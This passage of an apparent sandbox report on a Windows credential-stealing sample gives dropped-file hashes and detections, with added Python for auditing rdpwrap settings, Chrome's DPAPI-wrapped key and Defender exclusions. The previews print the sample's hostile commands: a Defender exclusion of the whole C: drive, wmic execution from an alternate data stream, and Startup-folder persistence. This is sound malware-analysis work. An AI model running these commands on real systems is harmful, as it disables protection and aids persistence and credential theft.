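     "terminal-server (app server) mode reported as licensed"),
    ("TerminalServices-RemoteConnectionManager-MaxUserSessions", "0",
     "per-user session cap set to 0 (assumed to mean no limit)"),
]


def audit(text: str) -> Dict[str, object]:
    """Summarise whether the file would make the host accept concurrent RDP sessions."""
    sections, malformed = parse_ini(text)
    main, policy = sections.get("Main", {}), sections.get("SLPolicy", {})
    # The SLPolicy values only take effect when the wrapper hooks the licensing query.
    hooks_active = any(main.get(k) == "1" for k in ("SLPolicyHookNT60", "SLPolicyHookNT61"))
    findings = [(key, reason) for key, bad, reason in RISKY_POLICIES if policy.get(key) == bad]
    multi = any(k.endswith("AllowMultipleSessions") for k, _ in findings)
    return {
        "hooks_active": hooks_active,
        "findings": findings,
        "malformed": malformed,
        "permits_concurrent_rdp": hooks_active and multi,
    }


if __name__ == "__main__":
    result = audit(RDPWRAP_INI_PREVIEW)
    print("concurrent RDP permitted:", result["permits_concurrent_rdp"])
    for key, reason in result["findings"]:
        print(f"  {key}: {reason}")
```

On a live host the same audit applies to any rdpwrap.ini found next to a termsrv-loaded DLL that is not Microsoft-signed; here the DLL was written to C:\Program Files\Microsoft DN1\ under a decoy name.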
                                                                  Process:C:\ProgramData\images.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):116736
                                                                  Entropy (8bit):5.884975745255681
                                                                  Encrypted:false
                                                                  SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                                  MD5:461ADE40B800AE80A40985594E1AC236
                                                                  SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                                  SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                                  SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Virustotal, Detection: 49%, Browse
                                                                  • Antivirus: Metadefender, Detection: 20%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                  Joe Sandbox View:
                                                                  • Filename: SOA & UNPAID INVOICES.pdf.exe, Detection: malicious
                                                                  • Filename: Suvhviwivhrjbykcqcwltjbuuplxoiafsc.exe, Detection: malicious
                                                                  • Filename: SecuriteInfo.com.Variant.Lazy.183857.17696.exe, Detection: malicious
                                                                  • Filename: request..exe, Detection: malicious
                                                                  • Filename: 24B0E23DF17C77D44882A2E25ECBD4D3B07015AF5D44C.exe, Detection: malicious
                                                                  • Filename: SecuriteInfo.com.W32.AIDetectNet.01.26190.exe, Detection: malicious
                                                                  • Filename: SecuriteInfo.com.W32.AIDetectNet.01.25523.exe, Detection: malicious
                                                                  • Filename: SecuriteInfo.com.W32.AIDetectNet.01.18574.exe, Detection: malicious
                                                                  • Filename: sat#U0131nalma sipari#U015fi 4503995683.exe, Detection: malicious
                                                                  • Filename: PO 202204TR.exe, Detection: malicious
                                                                  • Filename: Scan-file-09267992827627.exe, Detection: malicious
                                                                  • Filename: Nuevo pedido actualizad.exe, Detection: malicious
                                                                  • Filename: SecuriteInfo.com.Trojan.GenericKD.39486000.3897.exe, Detection: malicious
                                                                  • Filename: N2L7ikW1cK.exe, Detection: malicious
                                                                  • Filename: DHL_119040 receipt document.exe, Detection: malicious
                                                                  • Filename: yrokkcTZj4.exe, Detection: malicious
                                                                  • Filename: PO-11698 SLUB-DRAWING.pdf.exe, Detection: malicious
                                                                  • Filename: Doc_DELIVERY_89099388889904038838727.exe, Detection: malicious
                                                                  • Filename: Purchase order PL0028.exe, Detection: malicious
                                                                  • Filename: D7CfYxusMr6xkTb.exe, Detection: malicious
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                  Category:modified
                                                                  Size (bytes):222720
                                                                  Entropy (8bit):7.862505245807072
                                                                  Encrypted:false
                                                                  SSDEEP:6144:DcsB/VWq2pmz2WGO3LPJRWE/4F0xXKk7ETkFI49Poih:DciKMoO3LDn4uxXKk7FI4d
                                                                  MD5:DABC6F0C75C134E5310BA3526ADBA833
                                                                  SHA1:854EC103A64182C97E8F25E45DA04889DBBBF3FF
                                                                  SHA-256:9F9BAE001065A649A78CE6DE997F160EF32D03A2C28F4633A8386F75C938CADF
                                                                  SHA-512:C596890BF6062890483E9EE276C890B04396C8C6C758B318AB0D218C506AE362DB32E13FAF9691B2B96D5A4EDE03EE107C5B01714AB06C86C465EBD23326E877
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Y.........................................................................................1.......Y.............Rich............PE..L...3..b.................P... ......P;.......@....@..........................`............@.................................\N.......@..\....................P..(...........................L=......l=..............................................UPX0....................................UPX1.....P.......P..................@....rsrc.... ...@.......T..............@......................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                  Category:dropped
                                                                  Size (bytes):222720
                                                                  Entropy (8bit):7.862505245807072
                                                                  Encrypted:false
                                                                  SSDEEP:6144:DcsB/VWq2pmz2WGO3LPJRWE/4F0xXKk7ETkFI49Poih:DciKMoO3LDn4uxXKk7FI4d
                                                                  MD5:DABC6F0C75C134E5310BA3526ADBA833
                                                                  SHA1:854EC103A64182C97E8F25E45DA04889DBBBF3FF
                                                                  SHA-256:9F9BAE001065A649A78CE6DE997F160EF32D03A2C28F4633A8386F75C938CADF
                                                                  SHA-512:C596890BF6062890483E9EE276C890B04396C8C6C758B318AB0D218C506AE362DB32E13FAF9691B2B96D5A4EDE03EE107C5B01714AB06C86C465EBD23326E877
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 24%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Y.........................................................................................1.......Y.............Rich............PE..L...3..b.................P... ......P;.......@....@..........................`............@.................................\N.......@..\....................P..(...........................L=......l=..............................................UPX0....................................UPX1.....P.......P..................@....rsrc.... ...@.......T..............@......................................................................................................................................................................................................................................................................................................................................................................3.95.UPX!....
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):14734
                                                                  Entropy (8bit):4.993014478972177
                                                                  Encrypted:false
                                                                  SSDEEP:384:wZvOdB8Ypib4JNXp59HopbjvwRjdvRlAYotiQ0HzAF8:UvOdB8YNNZjHopbjoRjdvRlAYotinHzr
                                                                  MD5:C5A56B913DEEDCF5AE01A2D4F8AA69CE
                                                                  SHA1:C91D19BFD666FDD02B0739893833D4E1C0316511
                                                                  SHA-256:1C5C865E5A98F33E277A81FCDADFBAB1367176BA14F8590022F7E5880161C00D
                                                                  SHA-512:1058802FCD54817359F84977DD26AD4399C572910E67114F70B024EBADDF4E35E6AFF6461F90356205228B4B860E69392ABC27D38E284176C699916039CFA5ED
                                                                  Malicious:false
                                                                  Preview:PSMODULECACHE......#y;...Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1........Start-BitsTransfer........Set-BitsTransfer........Get-BitsTransfer........Resume-BitsTransfer........Add-BitsFile........Suspend-BitsTransfer........Complete-BitsTransfer........Remove-BitsTransfer........-.^(...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1....#...Set-AppBackgroundTaskResourcePolicy........Unregister-AppBackgroundTask........Get-AppBackgroundTask........tid........pfn........iru....%...Enable-AppBackgroundTaskDiagnosticLog........Start-AppBackgroundTask....&...Disable-AppBackgroundTaskDiagnosticLog.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Unins
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):21524
                                                                  Entropy (8bit):5.603674470472126
                                                                  Encrypted:false
                                                                  SSDEEP:384:itL6k0H6SVTDJ0Nr+RnYSBKnaul6GspE93G1u16zx5mHKHVY37bHjqIvUI++j/:r6gJlY4KaulKwG3xU+u7Lmly
                                                                  MD5:1492AC13C2B1E111C5C1164CAC260A7A
                                                                  SHA1:E674BAB629FFA7437600288ADA10F76C318C8BE4
                                                                  SHA-256:7093EAF8B4AEF9C1537F6D8E33993183D70CB3E90820901A7253C8DC2BFF12FF
                                                                  SHA-512:910A51D461442A23171DAA166446024609123C1521FDDDAE80966295FBAA04C6564404D9BDDC9A313E8E4F26B057315A709248F5B8621039B787EDE11C826FD3
                                                                  Malicious:false
                                                                  Preview:@...e.....................K.....N....................@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)P.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:very short file (no magic)
                                                                  Category:dropped
                                                                  Size (bytes):1
                                                                  Entropy (8bit):0.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:U:U
                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                  Malicious:false
                                                                  Preview:1
                                                                  Process:C:\ProgramData\images.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                  Category:dropped
                                                                  Size (bytes):40960
                                                                  Entropy (8bit):0.792852251086831
                                                                  Encrypted:false
                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                  Malicious:false
                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):140
                                                                  Entropy (8bit):4.86129651314522
                                                                  Encrypted:false
                                                                  SSDEEP:3:QwZ2vOUrKaM6eNGRjDWXp5cViEaKC5SufyM1K/RFofD6tRQLRWLyLRHgn:QElPhxuWXp+NaZ5SuH1MUmt2FWLyS
                                                                  MD5:C2E52EDB9BA6919C7D9F3CF0B88221E2
                                                                  SHA1:9972112AF86B48E937E589E262D21BAD251A6010
                                                                  SHA-256:FAE189421B6E7CC977F1D2A69D712C97B22E810B0AE3F2F4E258E1112694C560
                                                                  SHA-512:FDDEDA3E5D597D086B9C4412621078B3D14B6624DF2B003CA3238E3BD03DE35AAF3E16F04339AC54B04A723F98E76F17D74263F7D1CCBCA92B6FD2C325014B3B
                                                                  Malicious:true
                                                                  Preview:for /F "usebackq tokens=*" %%A in ("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start") do %%A
                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):59
                                                                  Entropy (8bit):4.2659637614761765
                                                                  Encrypted:false
                                                                  SSDEEP:3:eGAjGJwbZkREfcjMGERMQhM:ZuGJwi8cwGj
                                                                  MD5:579E29CEC6BDE04C5C074D8311D6B884
                                                                  SHA1:2FDFD4C6B8EB43A4C6F4C0D3998E4A5364221DFF
                                                                  SHA-256:65138897F467ADF9FE20594326D724D2CD5B437D9AACF5F83721AF340F70CE3C
                                                                  SHA-512:4011A9FD58C1DC8AA3ED79589D7232BBD06EB3FB32513D3C5B59B740ED89FDC9CCC9F3291812AFFF2CD679820BCD940AE3A49E41EBCBE20413821ACAD7C5191D
                                                                  Malicious:true
                                                                  Preview:wmic process call create '"C:\ProgramData:ApplicationData"'
                                                                  Process:C:\ProgramData\images.exe
                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):87165
                                                                  Entropy (8bit):6.102565506017432
                                                                  Encrypted:false
                                                                  SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                                                                  MD5:CC02ABB348037609ED09EC9157D55234
                                                                  SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                                                                  SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                                                                  SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                                                                  Malicious:false
                                                                  Preview:{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
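The file above, written by C:\ProgramData\images.exe, is a copy of Chrome's Local State, and its os_crypt.encrypted_key is the first thing a browser-credential stealer needs: Chromium keeps the AES-256-GCM key that protects saved passwords and cookies there, base64-encoded, prefixed with the ASCII tag "DPAPI" and wrapped with CryptProtectData for the logged-on user. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It parses the value and validates the DPAPI header (tag, blob version, provider GUID); REPORT_KEY_HEAD is the first 36 characters of the encrypted_key shown in the preview, and the Local State document it builds for an offline run is constructed, with a made-up wrapped key. Nothing here calls DPAPI.

```python
"""Inspect the os_crypt.encrypted_key a stealer reads from Chrome's Local State.

Added example, not part of the Joe Sandbox report or the sample. Chromium stores
the AES-256-GCM key that protects saved passwords and cookies in Local State as
base64 of the ASCII tag 'DPAPI' followed by a CryptProtectData blob wrapped for
the logged-on user. The constructed Local State below has a made-up wrapped key
with only the header fields real; REPORT_KEY_HEAD is the first 36 characters of
the encrypted_key shown in the preview above. Nothing here calls DPAPI.
"""
import base64
import json
import uuid

DPAPI_TAG = b"DPAPI"
# Provider GUID present in every CryptProtectData blob header.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# First 36 base64 characters of the report's os_crypt.encrypted_key: enough for the
# tag, the blob version and the provider GUID, nothing that could be decrypted.
REPORT_KEY_HEAD = "RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEA"


def encrypted_key_from_local_state(local_state_text):
    """Return the base64 os_crypt.encrypted_key from a Local State JSON document."""
    return json.loads(local_state_text)["os_crypt"]["encrypted_key"]


def inspect_wrapped_key(key_b64):
    """Validate the 'DPAPI' tag and the CryptProtectData header behind it.

    Layout: b'DPAPI' | dwVersion (LE32, 1) | provider GUID (16 bytes, little-endian
    fields) | opaque wrapped data (master-key GUID, flags, hash, ciphertext ...).
    Only the header is checked; the remainder needs CryptUnprotectData in the
    owning user's logon session.
    """
    raw = base64.b64decode(key_b64)
    if not raw.startswith(DPAPI_TAG):
        raise ValueError("os_crypt.encrypted_key is not DPAPI-wrapped")
    blob = raw[len(DPAPI_TAG):]
    if len(blob) < 20:
        raise ValueError("truncated CryptProtectData header")
    return {
        "dpapi_version": int.from_bytes(blob[:4], "little"),
        "provider_is_dpapi": uuid.UUID(bytes_le=blob[4:20]) == DPAPI_PROVIDER_GUID,
        "wrapped_remainder_len": len(blob) - 20,
    }


def constructed_local_state(filler_len=48):
    """A Local State document with a made-up wrapped key for offline runs (constructed).

    Only the layout is real: tag, version 1 and the provider GUID; the filler bytes
    stand in for the wrapped data and cannot be decrypted by anyone.
    """
    blob = (1).to_bytes(4, "little") + DPAPI_PROVIDER_GUID.bytes_le + bytes(filler_len)
    key_b64 = base64.b64encode(DPAPI_TAG + blob).decode("ascii")
    return json.dumps({"os_crypt": {"encrypted_key": key_b64}})


if __name__ == "__main__":
    print("report header:", inspect_wrapped_key(REPORT_KEY_HEAD))
    print("constructed:", inspect_wrapped_key(encrypted_key_from_local_state(constructed_local_state())))
```

The report's own value decodes to the tag, version 1 and the DPAPI provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb, which is how an analyst confirms that a Local State copy found in a stealer's working directory is the genuine file rather than a decoy. Unwrapping the remainder requires CryptUnprotectData in the victim's logon session (or the user's DPAPI master key), so a copied Local State on its own yields no passwords; that constraint is why stealers run the decryption on the infected host as the logged-on user.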
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):5048
                                                                  Entropy (8bit):5.391537877355324
                                                                  Encrypted:false
                                                                  SSDEEP:96:BZEh2N58qDo1ZiZDh2N58qDo1ZgM6UjZ1h2N58qDo1ZVFEEdZW:N8vd
                                                                  MD5:6845E5380ACF1B628551D90AE54909EF
                                                                  SHA1:B9C3A195360C41016D305960471481CA9DA3E94C
                                                                  SHA-256:3DEDBC9EE9E3D116C54885B6DBA56C67ACB7442EDD6DEFE55C5FF1B497D33E0C
                                                                  SHA-512:D9D9828E9A3426342ECAA3F9D2E4938DFC939B66BE9FDF358C4D5B0083AAFCE00729CE5160C9839E06F071C8DC459F01E14F5EFD01218A57EDA917CD9CB4DF5F
                                                                  Malicious:false
                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220522123355..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 6732..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220522123356..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20220522123738..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):5048
                                                                  Entropy (8bit):5.393687137718255
                                                                  Encrypted:false
                                                                  SSDEEP:96:BZ9h2N5dqDo1ZEZ6h2N5dqDo1ZQM6UjZoh2N5dqDo1ZFFEERZo:OINQ
                                                                  MD5:CD40D7F27D7F40B312A0A16DBE7ACE72
                                                                  SHA1:A66F76313958430BF10322D8428A43ACE8DDBF4E
                                                                  SHA-256:C0A23C24DF8C9D780BD4D84A63AA4AD9AB61C416349B1E4A8F76087EE294A06A
                                                                  SHA-512:A3920F40E3708648D47162DD70C400F2990150E68B4DBD7BFBCFAF95FDFC89D378FB479982EFBBAC9BE02E3E16D7C689569F831AC04F7E970FB64933C4DA7BF2
                                                                  Malicious:false
                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220522123336..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 6368..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220522123336..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20220522123656..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 301389 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus
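The two PowerShell transcripts above record the same command twice, once per session: Add-MpPreference -ExclusionPath C:\ (PIDs 6732 and 6368). Excluding a drive root takes everything under it out of Defender's scanning, which is what the sample wanted before dropping images.exe into C:\ProgramData. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses transcript files into sessions, pulls out every Add-MpPreference -Exclusion* command, and grades each exclusion by how much it hides. SAMPLE_TRANSCRIPT is constructed from the two previews plus one made-up, narrowly scoped session added for contrast.

```python
"""Audit Windows Defender exclusions recorded in PowerShell transcripts.

Added example, not part of the Joe Sandbox report or the sample. SAMPLE_TRANSCRIPT
is constructed from the two transcript previews above (Host Application
'powershell Add-MpPreference -ExclusionPath C:\\', PIDs 6732 and 6368) plus one
made-up benign session for contrast. Excluding a drive root stops Defender from
scanning anything under it, which is what this sample did before dropping
images.exe into C:\\ProgramData.
"""
import re

# Path prefixes whose exclusion effectively disables scanning for the host or profile.
BROAD_PREFIXES = (r"C:\ProgramData", r"C:\Users", r"C:\Windows", r"C:\Program Files")
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")
ADD_MP = re.compile(
    r"Add-MpPreference\s+(?P<kind>-Exclusion(?:Path|Process|Extension))\s+(?P<value>[^\r\n]+)",
    re.IGNORECASE)
SEVERITY = {"drive_root": "critical", "broad": "high", "narrow": "medium", "process_or_ext": "medium"}


def _field(chunk, label):
    """Value of a 'Label: value' header line inside one transcript session, or None."""
    m = re.search(label + r":\s*([^\r\n]*)", chunk)
    return m.group(1).strip() if m else None


def parse_transcript_sessions(text):
    """Split a transcript file at each 'transcript start' header and keep the fields an analyst needs."""
    sessions = []
    for chunk in re.split(r"Windows PowerShell transcript start", text)[1:]:
        pid = _field(chunk, "Process ID")
        sessions.append({
            "start": _field(chunk, "Start time"),
            "pid": int(pid) if pid else None,
            "user": _field(chunk, "RunAs User"),
            "host_application": _field(chunk, "Host Application"),
            # 'PS>' lines are the commands the transcript actually recorded.
            "commands": [m.group(1).strip() for m in re.finditer(r"^PS>(.+)$", chunk, re.M)],
        })
    return sessions


def exclusion_scope(value):
    """'drive_root', 'broad' or 'narrow' for an -ExclusionPath value."""
    v = value.strip().strip("'\"")
    if DRIVE_ROOT.match(v):
        return "drive_root"
    if any(v.lower().startswith(p.lower()) for p in BROAD_PREFIXES):
        return "broad"
    return "narrow"


def audit_defender_exclusions(transcript_text):
    """One finding per exclusion added, with severity by how much the exclusion hides."""
    findings = []
    for s in parse_transcript_sessions(transcript_text):
        for cmd in s["commands"]:
            m = ADD_MP.search(cmd)
            if not m:
                continue
            kind = m.group("kind")
            for value in m.group("value").split(","):
                scope = exclusion_scope(value) if kind.lower() == "-exclusionpath" else "process_or_ext"
                findings.append({"start": s["start"], "pid": s["pid"], "user": s["user"],
                                 "kind": kind, "value": value.strip().strip("'\""),
                                 "scope": scope, "severity": SEVERITY[scope]})
    return findings


# Constructed from the two transcript previews in the report, plus one made-up session.
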